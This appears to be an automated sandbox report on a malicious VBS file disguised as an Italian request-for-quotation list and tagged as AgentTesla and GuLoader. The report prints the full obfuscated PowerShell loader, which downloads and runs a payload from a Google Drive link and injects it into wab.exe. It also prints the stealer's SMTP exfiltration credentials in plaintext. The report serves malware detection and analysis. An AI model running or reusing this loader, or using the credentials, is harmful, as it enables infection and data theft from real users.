Overview

overview

10

Static

static

1

RFQ2024032...le.vbs

windows7-x64

10

RFQ2024032...le.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-03-2024 06:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ20240326_Lista commerciale.vbs

  • Size

    39KB

  • MD5

    57677b0b418974ecaa2bbce0a1307751

  • SHA1

    e6201e191e4b52eb11eb94436d5f2a3b156e447e

  • SHA256

    cd701adeeddc4cb8034b9b37b570fb777ef2e43919364881fea72800f8ce89c5

  • SHA512

    1c7b4658b1e675608c8c8e020320a55c2429506246b3e36bad54e4d88cf47c186b6e894c83bceedfb846fdd137f5405f8e9c43375beb89a61e41ed3795951a14

  • SSDEEP

    768:u05gBt/WAZGc8NnKwiQTdQUn2DoEx2E198Dbk:S1qNnKwKUwoEx2u9l

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.inkomech.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Amir@2021

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240326_Lista commerciale.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1356
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2636
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2464
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:2492
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:768

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        1008a132ab69d738200ba0923b6fdc42

        SHA1

        88738b9bcb2408d2a55dca2e6bb39d7621029ac5

        SHA256

        f7ecd14bd96d6a1cff61286fe4af480bb69b171b4f95281f61feaf3c9258e067

        SHA512

        28f6ebe8e4223b4696c245a619a46f7af2e6c0d9dafc122a3f76243e7293af0781942feceeb2f080aeec509e81f8d7c8ad5ad613e98741c40abeff4d98a2c126

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Cab3DEA.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UKJ4YGV3T5WLHRS8AWDT.temp
        Filesize

        7KB

        MD5

        ce7382950fe4a82c97830d3f6d577ef7

        SHA1

        a3de1e87281f2422134de8be59efff4c96e2454d

        SHA256

        560a429a6e1587669d2db76a66ec6ddee8d819b66f6e103f18265edd90fd745d

        SHA512

        522871b55533f3e8c5b3d6b29852b72439e878d1cfeeecb07f9802ee58d2b8c8085f0e38f9cb2dc23dd1dfdd3890567f8dcf76bbd52e9ce66952b6d3cf5cd929

        Download Submit
      • memory/768-69-0x0000000001640000-0x00000000045A9000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/768-51-0x0000000077436000-0x0000000077437000-memory.dmp
        Filesize

        4KB

        Download
      • memory/768-50-0x0000000077400000-0x00000000774D6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/768-81-0x0000000022BF0000-0x0000000022C30000-memory.dmp
        Filesize

        256KB

        Download
      • memory/768-47-0x0000000001640000-0x00000000045A9000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/768-75-0x00000000005D0000-0x0000000001632000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/768-79-0x00000000005D0000-0x0000000000612000-memory.dmp
        Filesize

        264KB

        Download
      • memory/768-49-0x0000000077210000-0x00000000773B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/768-80-0x000000006EC50000-0x000000006F33E000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/768-86-0x0000000022BF0000-0x0000000022C30000-memory.dmp
        Filesize

        256KB

        Download
      • memory/768-84-0x000000006EC50000-0x000000006F33E000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/1356-11-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-35-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-30-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-31-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-32-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-4-0x000000001B270000-0x000000001B552000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/1356-13-0x0000000002650000-0x0000000002662000-memory.dmp
        Filesize

        72KB

        Download
      • memory/1356-29-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1356-78-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1356-12-0x000000001B660000-0x000000001B682000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1356-10-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-9-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-8-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1356-7-0x0000000002690000-0x0000000002710000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1356-5-0x0000000001FD0000-0x0000000001FD8000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1356-6-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2464-16-0x0000000073250000-0x00000000737FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2464-46-0x0000000077400000-0x00000000774D6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2464-48-0x00000000067E0000-0x0000000009749000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/2464-45-0x00000000060E0000-0x00000000061E0000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2464-44-0x0000000077210000-0x00000000773B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2464-42-0x0000000073250000-0x00000000737FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2464-41-0x0000000002560000-0x00000000025A0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2464-39-0x00000000067E0000-0x0000000009749000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/2464-38-0x0000000073250000-0x00000000737FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2464-37-0x00000000067E0000-0x0000000009749000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/2464-77-0x00000000067E0000-0x0000000009749000-memory.dmp
        Filesize

        47.4MB

        Download
      • memory/2464-36-0x0000000005110000-0x0000000005111000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2464-34-0x00000000060E0000-0x00000000061E0000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2464-33-0x0000000002560000-0x00000000025A0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2464-19-0x0000000002560000-0x00000000025A0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2464-18-0x0000000073250000-0x00000000737FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2464-17-0x0000000002560000-0x00000000025A0000-memory.dmp
        Filesize

        256KB

        Download